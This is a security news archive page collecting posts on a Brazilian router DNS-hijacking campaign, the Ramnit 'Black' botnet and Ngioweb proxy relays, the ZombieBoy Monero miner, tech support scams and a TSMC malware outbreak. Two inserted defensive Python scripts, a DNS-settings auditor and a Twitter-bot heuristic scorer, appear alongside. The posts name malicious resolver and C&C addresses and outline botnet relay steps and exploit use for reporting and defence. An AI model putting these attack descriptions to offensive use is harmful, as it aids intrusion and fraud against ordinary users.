Category Archives: cyber crime

DNS Hijacking targets Brazilian financial institutions

Crooks are targeting DLink DSL modem routers in Brazil to redirect users to fake bank websites by carrying out DNS hijacking.

Crooks are targeting DLink DSL modem routers in Brazil to redirect users to fake bank websites by changing the DNS settings.

With this trick, cybercriminals steal login credentials for bank accounts, Radware researchers reported.

The attackers change the DNS settings so that the network devices point to DNS servers they control. In this campaign the experts observed crooks using two DNS servers, 69.162.89.185 and 198.50.222.136, which resolve the hostnames of Banco de Brasil (www.bb.com.br) and Itau Unibanco (www.itau.com.br) to bogus clones.

“The research center has been tracking malicious activity targeting DLink DSL modem routers in Brazil since June 8th. Via old exploits dating from 2015, a malicious agent is attempting to modify the DNS server settings in the routers of Brazilian residents, redirecting all their DNS requests through a malicious DNS server.” reads the analysis published by Radware.

“The malicious DNS server is hijacking requests for the hostname of Banco de Brasil (www.bb.com.br) and redirecting to a fake, cloned website hosted on the same malicious DNS server which has no connection whatsoever to the legitimate Banco de Brasil website.”

The hackers use old exploits dating from 2015 that work on some models of DLink DSL devices; they only have to scan for vulnerable routers exposed online and change their DNS settings.

The experts highlighted that the hijacking is performed without any user interaction.

“The attack is insidious in the sense that a user is completely unaware of the change. The hijacking works without crafting or changing URLs in the user’s browser. A user can use any browser and his/her regular shortcuts, the user can type in the URL manually or even use it from mobile devices, such as a smart phone or tablet.” reads the alert published by Radware.

“The user will still be sent to the malicious website instead of to their requested website and the hijacking effectively works at the gateway level.”

Attackers have also carried out phishing campaigns with crafted URLs and malvertising campaigns that attempt to change the DNS configuration from within the user’s browser. This kind of attack is not a novelty: hackers have been using similar techniques since 2014, and in 2016 an exploit tool known as RouterHunterBr 2.0 was published online that used the same malicious URLs, although Radware is currently not aware of abuse originating from this tool.

Radware has recorded several infection attempts using old D-Link DSL router exploits since June 12.

[Image: DNS hijacking]

The malicious URL used in the campaign appears as:

[Image: DNS hijacking 2, the malicious URL]

Several exploits for multiple DSL routers, mostly D-Link, have been available online since February 2015.

Once the victims visit the fake websites, they are asked for bank information, including agency number, account number, mobile phone number, card PIN, eight-digit PIN, and a CABB number.

The experts noticed that the phishing websites used in the campaign are flagged as not secure in the browser address bar.

Radware reported the campaigns to the financial institutions targeted by the attacks, and the fake websites have since been taken offline.

“A convenient way for checking DNS servers used by your devices and router is through websites like http://www.whatsmydnsserver.com/.
Only modems and routers that were not updated in the last two years can be exploited. Updates will protect the owner of the device and also prevent devices being enslaved for use in DDoS attacks or used to conceal targeted attacks.” recommends Radware.
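As an added defender-side check (not Radware's tooling and not code from the post), the following Python audits a router's upstream DNS servers against the two resolver addresses named above and looks for the pattern the analysis describes: a bank hostname resolving to the malicious DNS server itself. The sample data is constructed; the 192.0.2.x and 203.0.113.x addresses are RFC 5737 documentation space standing in for real ISP and bank addresses, which the post does not give.

```python
import ipaddress

# Resolver addresses named in the Radware analysis quoted above.
KNOWN_BAD_RESOLVERS = {"69.162.89.185", "198.50.222.136"}

# Bank hostnames the campaign redirected.
WATCHED_HOSTNAMES = ("www.bb.com.br", "www.itau.com.br")


def audit_dns(upstream_resolvers, observed, trusted):
    """Audit the DNS servers a router forwards its clients' queries to.

    upstream_resolvers: the resolver IPs found in the router's configuration.
    observed: {hostname: {resolver_ip: answered_ip}}, the A record each
              configured resolver returned for the watched hostnames.
    trusted:  {hostname: answered_ip}, the same names resolved through a
              resolver you control, used as the reference answer.
    Returns a list of (severity, detail) findings; an empty list is clean.
    """
    findings = []
    for resolver in upstream_resolvers:
        try:
            ipaddress.ip_address(resolver)
        except ValueError:
            findings.append(("warn", f"{resolver}: not a valid IP address"))
            continue
        if resolver in KNOWN_BAD_RESOLVERS:
            findings.append(("high", f"{resolver}: resolver is a known campaign IoC"))
        for host in WATCHED_HOSTNAMES:
            answer = observed.get(host, {}).get(resolver)
            if answer is None:
                findings.append(("warn", f"{resolver}: no answer recorded for {host}"))
            elif answer == resolver:
                # The clone was hosted on the malicious DNS server itself, so a
                # bank name resolving to the resolver's own address is the
                # signature of this campaign.
                findings.append(("high", f"{host}: resolves to the resolver {resolver} itself"))
            elif answer in KNOWN_BAD_RESOLVERS:
                findings.append(("high", f"{host}: {resolver} answered with campaign IoC {answer}"))
            elif answer != trusted.get(host):
                findings.append(("medium", f"{host}: {resolver} answered {answer}, "
                                           f"trusted resolver answered {trusted.get(host)}"))
    return findings


# Constructed reference answers from a resolver you control. 203.0.113.x is
# RFC 5737 documentation space standing in for the banks' real addresses,
# which the post does not give.
TRUSTED = {"www.bb.com.br": "203.0.113.10", "www.itau.com.br": "203.0.113.20"}

# Constructed snapshot of a router after the hijack described in the post.
HIJACKED_ROUTER = {
    "upstream": ["69.162.89.185", "198.50.222.136"],
    "observed": {
        "www.bb.com.br": {"69.162.89.185": "69.162.89.185",
                          "198.50.222.136": "69.162.89.185"},
        "www.itau.com.br": {"69.162.89.185": "198.50.222.136",
                            "198.50.222.136": "198.50.222.136"},
    },
}

# Constructed snapshot of a router still using its ISP's resolver
# (192.0.2.53 is also documentation space).
CLEAN_ROUTER = {
    "upstream": ["192.0.2.53"],
    "observed": {
        "www.bb.com.br": {"192.0.2.53": "203.0.113.10"},
        "www.itau.com.br": {"192.0.2.53": "203.0.113.20"},
    },
}


def audit_router(router, trusted=TRUSTED):
    """Convenience wrapper over audit_dns for a router snapshot dict."""
    return audit_dns(router["upstream"], router["observed"], trusted)


if __name__ == "__main__":
    for name, router in (("hijacked", HIJACKED_ROUTER), ("clean", CLEAN_ROUTER)):
        findings = audit_router(router)
        print(f"{name}: {len(findings)} finding(s)")
        for severity, detail in findings:
            print(f"  [{severity}] {detail}")
```

Capturing the `observed` answers means querying each configured resolver directly (for example with `dig @resolver hostname`) rather than through the router, so that a hijacked forwarder cannot mask the difference.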

Pierluigi Paganini

(Security Affairs – DNS hijacking, hacking)

The post DNS Hijacking targets Brazilian financial institutions appeared first on Security Affairs.

Security Affairs: Security Affairs newsletter Round 175 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      A malware paralyzed TSMC plants where also Apple produces its devices
·      Do Businesses Know When They're Using Unethical Data?
·      Russian troll factory suspected to be behind the attack against Italian President Mattarella
·      Salesforce warns of API error that exposed Marketing data
·      Tech Support Scams improved with adoption of Call Optimization Service
·      Dept. of Energy announced the Liberty Eclipse exercise to test electrical grid against cyber attacks
·      Fortnite APK is coming soon, but it will not be available on the Google Play Store
·      TCM Bank: website misconfiguration exposed applicant data for 16 months
·      ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis
·      Duo Security created open tools and techniques to identify large Twitter botnet
·      Group-IB experts record a massive surge of user data leaks from cryptocurrency exchanges
·      HP releases firmware updates for two critical RCE flaws in Inkjet Printers
·      TSMC Chip Maker confirms its facilities were infected with WannaCry ransomware
·      GitHub started warning users when adopting compromised credentials
·      Hacking WiFi Password in a few steps using a new attack on WPA/WPA2
·      Ramnit is back and contributes in creating a massive proxy botnet, tracked as ‘Black’ botnet
·      Snapchat source Code leaked after an iOS update exposed it
·      BIND DNS software includes a security feature that could be abused to cause DoS condition
·      DeepLocker – AI-powered malware are already among us
·      Researchers find vulnerabilities in WhatsApp that allow to spread Fake News via group chats
·      Security expert discovered a bug that affects million Kaspersky VPN users
·      Social Mapper – Correlate social media profiles with facial recognition
·      The analysis of the code reuse revealed many links between North Korea malware
·      Experts explained how to hack macs in enterprises through MDM
·      Group-IB: The Shadow Market Is Flooded with Cheap Mining Software
·      Quiet Skies, TSA surveillance program targets Ordinary U.S. Citizens

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 175 – News of the week appeared first on Security Affairs.




Security Affairs: Group-IB: The Shadow Market Is Flooded with Cheap Mining Software

Group-IB is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations.

Group-IB, an international company specializing in the prevention of cyberattacks, is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations. According to Group-IB’s Threat Intelligence, over a year, the number of shadow-forum ads offering mining software has increased fivefold (H1 2018 vs H1 2017). Group-IB experts say it is a very dangerous tendency to have so many mining Trojans available designed to use other people’s devices and infrastructure for illegitimate generation of cryptocurrency.

Cryptojacking (using computation capacity of a computer or infrastructure for cryptocurrency mining without the knowledge or consent of its owner) is still a comparatively popular method of personal gain, in spite of a clear tendency toward a decrease in the number of incidents of this type of fraud. Growth in the number of such thefts may be caused not only by the growth of mining software offers in Darknet but also by their comparatively low price, which is often less than $0.50.

[Image: Mining Software darkweb cryptojacking]

The low entry barrier to the illegal mining market results in a situation where cryptocurrency is being mined by people without technical expertise or experience with fraudulent schemes. When they gain access to simple tools for making money off hidden cryptocurrency mining, they don’t consider it a crime, all the more so as the Russian legislative environment still leaves enough loopholes to avoid prosecution for such thefts. There are still very few arrests and cases of prosecution for cryptojacking.

One cryptocoin after another: what are the dangers of mining?

Any device (computer, smartphone, IoT device, server, etc.) may be used for cryptojacking, which is why it is not enough to install detection systems at the workstation level alone. New types of mining software that bypass purely signature-based security systems appear regularly. An appropriate response to this threat is the analysis of the various manifestations of mining at the network level, which requires, among other things, behavioral analysis technologies to detect previously unknown programs and tools.

Group-IB experts warn that mining results not just in direct financial losses due to increased electricity expenditure. It threatens the stability and continuity of business processes by slowing corporate systems and accelerating hardware wear. Infection of infrastructure with a mining Trojan may result in the failure of corporate apps, networks and systems. Unauthorized external programs running without the knowledge of business owners also carry reputational losses, as well as compliance and regulatory risks.

What should we do? 

Integrated countermeasures against cryptojacking require the detection of all forms of malicious code distributed or running in the network, based on a regularly updated threat database (Threat Intelligence class). Suspicious activity should always be analyzed in a secure, isolated environment to ensure the confidentiality of data about infected computers, infrastructure segments and other resources. It is important not only to protect your own network, but also to detect cryptomining tools running as JavaScript on hacked resources that seek to infect as many visitors as possible. One more type of fraud has been gaining popularity recently: the use of traditional insiders. Companies should be able to protect themselves against their own dishonest employees who attempt to increase their incomes at the expense of their employer’s resources.

About the Author: Group-IB Corporate Communications 

http://www.group-ib.ru

https://www.group-ib.ru/blog/

telegram | facebook | twitter | linkedin

Pierluigi Paganini

(Security Affairs – cryptojacking, DarkWeb)

The post Group-IB: The Shadow Market Is Flooded with Cheap Mining Software appeared first on Security Affairs.




PGA Golf Championship hit with Bitcoin ransomware

By Waqas

Hackers Demand Ransom to Unlock Hijacked Files of Upcoming PGA Golf Championship. Hackers seem to have a penchant for targeting high-profile events. After successfully attempting to make American presidential elections questionable, now cybercriminals have their eyes set on key PGA tournaments. Reportedly, to jeopardize this week’s PGA Championship, which is due to be held at […]

This is a post from HackRead.com Read the original post: PGA Golf Championship hit with Bitcoin ransomware

My Little Pony animator jailed for possessing 60k child abuse images

By Carolina

He is now diagnosed with a condition called Pedophilic Disorder. An Ottawa-based animator has received 28 months in prison for possessing child pornography content. The 55-year old Tom Wysom is an artist by profession, who is known for his contribution in various animated TV shows for children including My Little Pony. At the time of his […]

This is a post from HackRead.com Read the original post: My Little Pony animator jailed for possessing 60k child abuse images

Ramnit is back and contributes in creating a massive proxy botnet, tracked as ‘Black’ botnet

Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, created by Ramnit operators.

Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, that could be the sign of a wider ongoing operation involving the Ramnit operators.

Ramnit is one of the most popular banking malware families in existence today. It was first spotted in 2010 as a worm; in 2011 its authors improved it starting from the leaked Zeus source code, turning the malware into a banking Trojan. In 2014 it reached the pinnacle of its success, becoming the fourth largest botnet in the world.

In 2015, Europol partnering with several private technology firms announced the takedown of the Ramnit C2 infrastructure.

A few months later Ramnit was back: researchers at IBM Security discovered a new variant of the popular Trojan.

Recently the experts observed that the “Black” botnet campaign has infected up to 100,000 systems in two months, and this is just the tip of the iceberg, because according to the researchers a second-stage malware called Ngioweb is already spreading.

There is a concrete risk that the Ramnit operators are using the two malware families to build a large, multi-purpose proxy botnet that could be used for many fraudulent activities (e.g. DDoS attacks, ransomware campaigns, cryptocurrency mining campaigns).

“Recently we discovered the Ramnit C&C server (185.44.75.109) which is not related to the previously most prevalent botnet “demetra”. According to domain names which are resolved to the IP address of this C&C server, it pretends to control even old bots, first seen back in 2015. We named this botnet “Black” due to the RC4 key value, “black”, that is used for traffic encryption in this botnet.” reads the analysis published by Checkpoint security.

“This C&C server has actually been active since 6th March 2018 but didn’t attract attention because of the low capacity of the “black” botnet at that time. However, in May-July 2018 we detected a new Ramnit campaign with around 100,000 computers infected.”

According to the experts, in the Black operation, the Ramnit malware is distributed via spam campaigns. The malicious code works as a first-stage malware and it is used to deliver a second-stage malware dubbed Ngioweb.

“Ngioweb represents a multifunctional proxy server which uses its own binary protocol with two layers of encryption,” continues the analysis published by Checkpoint.

“The proxy malware supports back-connect mode, relay mode, IPv4, IPv6 protocols, TCP and UDP transports, with first samples seen in the second half of 2017.”

Ngioweb uses a two-stage C&C infrastructure: the STAGE-0 C&C server tells the malware which STAGE-1 C&C server to contact, and an unencrypted HTTP connection is used for this purpose. The STAGE-1 C&C server then controls the malware over an encrypted connection.

[Image: Ramnit campaign]

The Ngioweb malware can operate in two main modes, the Regular back-connect proxy, and the Relay proxy mode.

In a relay proxy mode, the malware allows operators to build chains of proxies and hide their services behind the IP address of a bot.

“The following sequence of actions is used for building a hidden service using the Ngioweb botnet:

  1. Ngioweb Bot-A connects to C&C STAGE-0 and receives command to connect to the server C&C STAGE-1 with address X:6666.
  2. Ngioweb Bot-A connects to C&C STAGE-1 (Server-X) at X:6666. Server-X asks the bot to start the TCP server. Ngioweb bot reports on starting TCP server with IP address and port.
  3. Malware actor publishes the address of the Bot-A in DNS (or using any other public channel).
  4. Another malware Bot-B resolves the address of Bot-A using DNS (or using any other public channel).
  5. Bot-B connects to Bot-A.
  6. Bot-A creates new connection to Server-X and works as relay between Server-X and Bot-B.”

[Image: Ramnit campaign 3]

Further details, including the IoC, are reported in the analysis published by Checkpoint.

Pierluigi Paganini

(Security Affairs – cybercrime, Ramnit botnet)

The post Ramnit is back and contributes in creating a massive proxy botnet, tracked as ‘Black’ botnet appeared first on Security Affairs.

Duo Security created open tools and techniques to identify large Twitter botnet

Researchers at security firm Duo Security have created a set of open source tools and disclosed techniques that could be used to identify large Twitter botnet.

Security experts from Duo Security have developed a collection of open source tools and disclosed techniques that can be useful in identifying large Twitter botnet.

The experts developed the tools starting from the analysis of 88 million Twitter accounts and over half-a-billion tweets, one of the largest random datasets of Twitter accounts analyzed to date.

“This paper details the techniques and tools we created to both build a large dataset containing millions of public Twitter profiles and content, as well as to analyze the dataset looking for automated accounts.” reads the research paper published by Duo Security.

“By applying a methodical data science approach to analyzing our dataset, we were able to build a classifier that effectively finds bots at a large scale.”

The dataset was built using Twitter’s API; the collected records include profile name, tweet and follower counts, avatar, bio, the content of tweets, and social network connections.

Practical data science techniques can be used to create a classifier that could help researchers in finding automated Twitter accounts.

The experts defined 20 unique account heuristics to discover the bots, including the number of digits in a screen name, the entropy of the screen name, the followers/following ratio, the number of tweets and likes relative to the account’s age, the number of users mentioned in a tweet, the number of tweets with the same content, the percentage of tweets with URLs, the time between tweets, the average hours tweeted per day, and the average “distance” of account age in retweets/replies.

The above heuristics are organized into three categories: “Account attributes,” “Content,” and “Content Metadata.”
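As an added illustration (not Duo Security's classifier and not code from the paper), the following Python computes several of the heuristics listed above over two constructed sample accounts and combines them with fixed thresholds that are my assumption for this example, not values from the paper, whose classifier is trained from data.

```python
import math
from collections import Counter
from datetime import datetime, timedelta, timezone

# Fixed "current time" so the constructed accounts give stable numbers.
NOW = datetime(2018, 8, 10, tzinfo=timezone.utc)


def digit_count(screen_name):
    """Number of digits in the screen name (an account attribute heuristic)."""
    return sum(ch.isdigit() for ch in screen_name)


def shannon_entropy(text):
    """Shannon entropy of the screen name in bits per character.

    Random-looking names such as generated handles score higher than
    names built from a few dictionary words.
    """
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def account_features(acct, now=NOW):
    """Derive account-attribute, content and content-metadata heuristics.

    acct is a dict with screen_name, created_at, followers, following, likes
    and tweets (a list of (timestamp, text) pairs).
    """
    tweets = acct["tweets"]
    texts = [text for _, text in tweets]
    age_days = max((now - acct["created_at"]).total_seconds() / 86400, 1.0)
    # Tweets whose text appears more than once in the timeline.
    repeated = sum(c for c in Counter(texts).values() if c > 1)
    times = sorted(ts for ts, _ in tweets)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    n = len(texts)
    return {
        "digits_in_name": digit_count(acct["screen_name"]),
        "name_entropy": round(shannon_entropy(acct["screen_name"]), 3),
        "follow_ratio": acct["followers"] / max(acct["following"], 1),
        "tweets_per_day": n / age_days,
        "likes_per_day": acct["likes"] / age_days,
        "dup_content_ratio": repeated / n if n else 0.0,
        "url_ratio": sum("http" in t for t in texts) / n if n else 0.0,
        "mean_gap_s": sum(gaps) / len(gaps) if gaps else float("inf"),
    }


def bot_score(f):
    """Count how many heuristics fall on the 'automated' side.

    The cut-offs are illustrative assumptions for this example only.
    """
    checks = (
        f["digits_in_name"] >= 4,
        f["name_entropy"] > 3.5,
        f["follow_ratio"] < 0.1,
        f["tweets_per_day"] > 50,
        f["dup_content_ratio"] > 0.5,
        f["url_ratio"] > 0.8,
        f["mean_gap_s"] < 120,
    )
    return sum(checks)


def classify(acct, now=NOW, threshold=4):
    """Label an account from its heuristic score (threshold is an assumption)."""
    score = bot_score(account_features(acct, now))
    return "likely automated" if score >= threshold else "likely human"


# Constructed sample accounts (not real Twitter data).
BOT_ACCOUNT = {
    "screen_name": "btcgift_48213907",
    "created_at": NOW - timedelta(days=2),
    "followers": 3, "following": 900, "likes": 0,
    # 200 identical posts, one per minute, each carrying a link.
    "tweets": [(NOW - timedelta(minutes=i),
                "Giveaway: send 0.1 BTC, get 1 BTC back https://example.invalid/claim")
               for i in range(200)],
}

HUMAN_ACCOUNT = {
    "screen_name": "maria_lopes",
    "created_at": NOW - timedelta(days=1500),
    "followers": 240, "following": 310, "likes": 900,
    "tweets": [(NOW - timedelta(days=i), f"Day {i}: notes from the garden")
               for i in range(10)]
              + [(NOW - timedelta(days=10), "New post: https://example.invalid/blog/1"),
                 (NOW - timedelta(days=11), "Photos: https://example.invalid/photos")],
}

if __name__ == "__main__":
    for acct in (BOT_ACCOUNT, HUMAN_ACCOUNT):
        feats = account_features(acct)
        print(acct["screen_name"], bot_score(feats), classify(acct), feats)
```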

The tools and techniques devised by the researchers could be very useful in investigating fraudulent activities associated with Twitter botnets. The experts first identify the automated bots, then use the tools to monitor the evolution of the botnets they belong to.

The experts shared a case study related to the discovery of a sophisticated botnet of at least 15,000 bots involved in a cryptocurrency scam. The analysis of the botnet and the monitoring of the malicious infrastructure over time allowed the experts to discover how bots evolve to evade detection.

The experts reported their findings to Twitter, which confirmed it is aware of the problem and is currently working on implementing new security measures to detect problematic accounts.

[Image: Twitter botnet]

“Twitter is aware of this form of manipulation and is proactively implementing a number of detections to prevent these types of accounts from engaging with others in a deceptive manner. Spam and certain forms of automation are against Twitter’s rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections.” replied Twitter.

“When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter’s API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related.”

Duo Security will release its tools as open source on August 8 during the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” concluded Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”

Pierluigi Paganini

(Security Affairs – Twitter botnet, social media)

The post Duo Security created open tools and techniques to identify large Twitter botnet appeared first on Security Affairs.

Group-IB experts record a massive surge of user data leaks from cryptocurrency exchanges

Group-IB researchers have investigated user data leaks from cryptocurrency exchanges and has analyzed the nature of these incidents.

Security experts from Group-IB, an international company specializing in preventing cyberattacks and developing information security solutions, have investigated user data leaks from cryptocurrency exchanges and analyzed the nature of these incidents. Within a year, the number of data leaks soared by 369%.

The USA, Russia and China are the top three countries whose registered users became the victims of cyberattacks.

In 2017, when cryptocurrencies were gaining momentum, their record-breaking capitalization and a spike in Bitcoin’s exchange rate led to dozens of attacks on cryptocurrency services. Based on data obtained from the Group-IB Threat Intelligence (cyber intelligence) system, experts from the international company Group-IB have analyzed the theft of 720 user accounts (logins and passwords) from the 19 largest cryptocurrency exchanges.

January holidays for hackers: a 689% surge in the number of leaks

The report “2018 Cryptocurrency Exchanges. User Accounts Leaks Analysis” shows a steady increase in the number of compromised user accounts on cryptocurrency exchanges. In 2017, their number increased by 369% compared to 2016. The first month of 2018 set a record: due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average. The USA, Russia, and China are the countries where users are targeted most often. The study has shown that every third victim of the attack is located in the United States.

[Image: cryptocurrency exchanges affected]

Toolkit and infrastructure used for attacks

Experts of Group-IB have identified 50 active botnets used for launching cyberattacks on cryptocurrency exchanges users. The infrastructure used by cybercriminals is mainly based in the USA (56.1%), the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).

[Image: cryptocurrency exchanges affected]

The attackers use an increasingly wide range of malicious software and update their tools on a regular basis. The most frequently used malicious software includes Trojans such as AZORult and Pony Formgrabber, as well as the Qbot. At the same time, cybercriminals have modified tools previously used for attacks on banks and now successfully use them to hack cryptocurrency exchanges and gain access to users’ personal data.

What makes a successful attack possible?

This is one of the key issues covered in the Group-IB report. The answer is actually quite simple: disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.

Group-IB has analyzed 720 accounts and found that one out of five users chose a password shorter than 8 characters (see Figure).

[Image: cryptocurrency exchanges affected, password lengths]

Attack as a premonition

Experts of Group-IB draw a bleak conclusion: currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users. At least 5 out of 19 exchanges in question fell victim to targeted cyberattacks widely covered by the media. These are Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniex and, presumably, Huobi. There are various attack vectors: errors in the source code of the software, phishing attacks, unauthorized access to the user database, vulnerabilities related to storage and withdrawal of funds. However, all of them stem from the lack of attention to information security and protection of digital assets.

“Increased fraudulent activity and attention of hacker groups to cryptoindustry, additional functional of malicious software related to cryptocurrencies, as well as the significant amounts of already stolen funds, signals that the industry is not ready to defend itself and protect its users”, says Ruslan Yusufov, the Director of Special Projects at Group-IB. “In 2018 we will see even more incidents. This situation requires prompt and effective response of all stakeholders, including experts in different areas.”

Recommendations of Group-IB experts to users and exchanges

In order to protect one’s funds against crypto-fraud, Group-IB recommends users to be mindful of their passwords (which should contain at least 14 unique symbols), never use the same passwords for different exchanges and always enable the 2FA (two-factor authentication). Experts recommend avoiding the use of public Wi-Fi (at least when carrying out exchange transactions) and paying special attention to one’s “traces” on the social media. For instance, users should not demonstrate the fact that they possess any cryptocurrency.

Recommendations to cryptoexchanges are also of high importance. First of all, they are strongly advised to make two-factor authentication mandatory for all users and their operations, to conduct regular security audits of their IT infrastructure and related services, and to allocate resources to security training and awareness-raising for personnel, from top management (founders) down to rank-and-file employees. To improve the cybersecurity of cryptocurrency exchanges, experts also recommend installing anti-APT solutions, using threat intelligence and implementing anti-fraud solutions, as well as behavioral analysis systems. Specialists also suggest preparing cybersecurity incident response plans to minimize potential damage.

About the Author: Group-IB Corporate Communications 

http://www.group-ib.ru

https://www.group-ib.ru/blog/


Pierluigi Paganini

(Security Affairs – data leak, cryptocurrency exchanges)

The post Group-IB experts record a massive surge of user data leaks from cryptocurrency exchanges appeared first on Security Affairs.

iPhone Chip Maker Firm Attacked with Computer Virus

By Uzair Amir

Launch of Many New iPhone Models May be Delayed. The world’s leading semiconductors and processors’ manufacturing firm and sole supplier of Apple iPhone chipsets, Taiwan Semiconductor Manufacturing Company (TSMC), became the target of a cyber-attack on Friday night. Reportedly, TSMC had to shut down its manufacturing plants because of the attack. It is revealed that […]

This is a post from HackRead.com Read the original post: iPhone Chip Maker Firm Attacked with Computer Virus

Security Affairs: ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis

A security researcher discovered a new crypto mining worm dubbed ZombieBoy that leverages several exploits to evade detection.

The security researcher James Quinn has spotted a new strain of crypto mining worm dubbed ZombieBoy that appears to be very profitable and leverages several exploits to evade detection.

The expert named the new malware ZombieBoy because it uses a tool called ZombieBoyTools to drop the first DLL; it then uses several exploits to spread.

Unlike MassMiner cryptocurrency miner, ZombieBoy leverages WinEggDrop instead of MassScan to search for new hosts to infect.


The miner uses Simplified Chinese in its code, which suggests that its author is a Chinese coder.

The ZombieBoy miner leverages several exploits, including:

ZombieBoy also uses both of the NSA-linked exploits DoublePulsar and EternalBlue to remotely install the main DLL. The malware uses ZombieBoyTools to deploy the two exploits.

Once the malware has established a backdoor on the target system, it could deliver other families of malware, such as ransomware and keyloggers.

According to Quinn, the 64.exe module downloaded by ZombieBoy uses the DoublePulsar exploit to install both an SMB backdoor and an RDP backdoor.

The same component uses XMRIG to mine Monero at 43 KH/s, which means the attackers can earn $1,000 a month at the current rate.

“In addition, 64.exe uses XMRIG to mine for XMR. Prior to shutting down one of its addresses on minexmr.com, ZombieBoy was mining at around 43KH/s. This would earn the attackers slightly over $1,000 per month at current Monero prices.” continues the analysis.

Quinn highlighted that the miner is being updated constantly; he is observing new samples on a daily basis.

The malware is able to detect virtual machines and does not run in a virtualized environment, which makes its analysis and detection harder.

Further details including IoCs are reported in the analysis published by the expert.

Pierluigi Paganini

(Security Affairs – miner, Monero)

The post ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis appeared first on Security Affairs.




iKeyMonitor: A parental control app ensuring safety of your child

By Carolina

Parents are raising a completely new breed of kids. Nowadays, toddlers use mobile devices and teens use text messages to communicate. Many schools have also integrated computers and tablets in their curriculum. To ensure children use the Internet safely, parents need a parental control app such as iKeyMonitor. Parents do allow their children to use […]

This is a post from HackRead.com Read the original post: iKeyMonitor: A parental control app ensuring safety of your child

Security Affairs: Tech Support Scams improved with adoption of Call Optimization Service

Security experts from Symantec are warning of tech support scams abusing Call Optimization Services to insert phone numbers.

Crooks are improving their tech support scams by using Call Optimization Services that are commonly used in legitimate call center operations to perform:

  • Tracking the source of inbound calls
  • Creation and management of phone numbers
  • Call load balancing
  • Call forwarding
  • Call analytics
  • Call routing
  • Call recording

Scammers continue to improve their techniques, and now they are using the service to dynamically insert phone numbers into their scam web pages and potentially gain additional features that make their scams more successful.

The scams begin when unwitting victims visit a malicious website or are redirected to a bogus website in various ways, such as through a malvertising campaign.

“The scam web page informs the victim that the computer has been blocked due to a malware infection and tries to lure the user into calling a “toll free” number for assistance. An audio file, stating that the computer is infected, is also played in the background when the user arrives on the scam web page.” reads the analysis published by Symantec.

The malicious page implements several tricks to prevent victims from closing it. The pages display notification dialogs in full-screen mode or execute a JavaScript routine that makes the site unresponsive.

The pages display a list of numbers to call to fix the problem and users in panic tend to call them.

According to Symantec, crooks leverage call optimization services in order to dynamically insert phone numbers into a scam page.

This specific tech support scam not only performs browser fingerprinting, it also retrieves the browser version, based on which the crooks redirect victims to different scam pages.

The crooks use a script from the call optimization service to check for a specific tag in the scam URL; the script then retrieves the scammer’s phone number from the service’s servers. When the servers return the scammer’s phone number, the tag triggers the “Callback” function, which retrieves and displays the appropriate phone number for victims to call.

If the tag from the call optimization service is not present in the scam URL, the phone number is instead retrieved by loading an XML file via the loadXMLDoc() function and is then displayed on the scam page.

The advantage of using the call optimization service’s tag in the URL is that it allows the scammers to dynamically insert phone numbers into their scam pages that are “localized”, that is, a different number is shown based on the victim’s country. Victims are shown a phone number that reaches someone who speaks their language.

“However, by using the call optimization service’s tag in the URL the scammers can dynamically insert phone numbers into their scam pages,” continues Symantec. 

“This can be useful, for example, if victims are based in multiple countries, as the victim can be shown a phone number that calls someone that speaks their language.”

Crooks can also abuse Call Optimization Services in their tech support scams for other purposes, for example to obtain call analytics or to load-balance calls during busy periods so that no calls are lost.

Pierluigi Paganini

(Security Affairs – Call Optimization Services, tech support scams)

The post Tech Support Scams improved with adoption of Call Optimization Service appeared first on Security Affairs.




A malware paralyzed TSMC plants where also Apple produces its devices

A virus has infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the plants where Apple produces its devices

Malware infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the iPhone chipmaker’s plants.

TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc.

According to Bloomberg, which first reported the news, the infection caused one of the most severe disruptions suffered by the company as it ramps up chipmaking for Apple Inc.’s next iPhones.

The company contained the problem, but some of the affected plants will not be able to restart before Sunday.

“The sole maker of the iPhone’s main processor said a number of its fabrication tools had been infected, and while it had contained the problem and resumed some production, several of its factories won’t restart till at least Sunday. The virus wasn’t introduced by a hacker, the company added in a statement.” states Bloomberg.

“Certain factories returned to normal in a short period of time, and we expect the others will return to normal in one day,” the company said in its Saturday statement.

This is the first time malware has crippled a TSMC facility and paralyzed production; according to the company, “the degree of infection varied from factory to factory.”

“TSMC has been attacked by viruses before, but this is the first time a virus attack has affected our production lines,” Chief Financial Officer Lora Ho told Bloomberg News by phone.


The economic impact of incidents of this kind can be severe; at the time of writing there is no information about the losses caused by the attack on the Taiwanese firm.

At the time of writing it is not possible to estimate the potential effects on the production of Apple devices; as Bloomberg notes, “the implications are also unclear for Apple.”

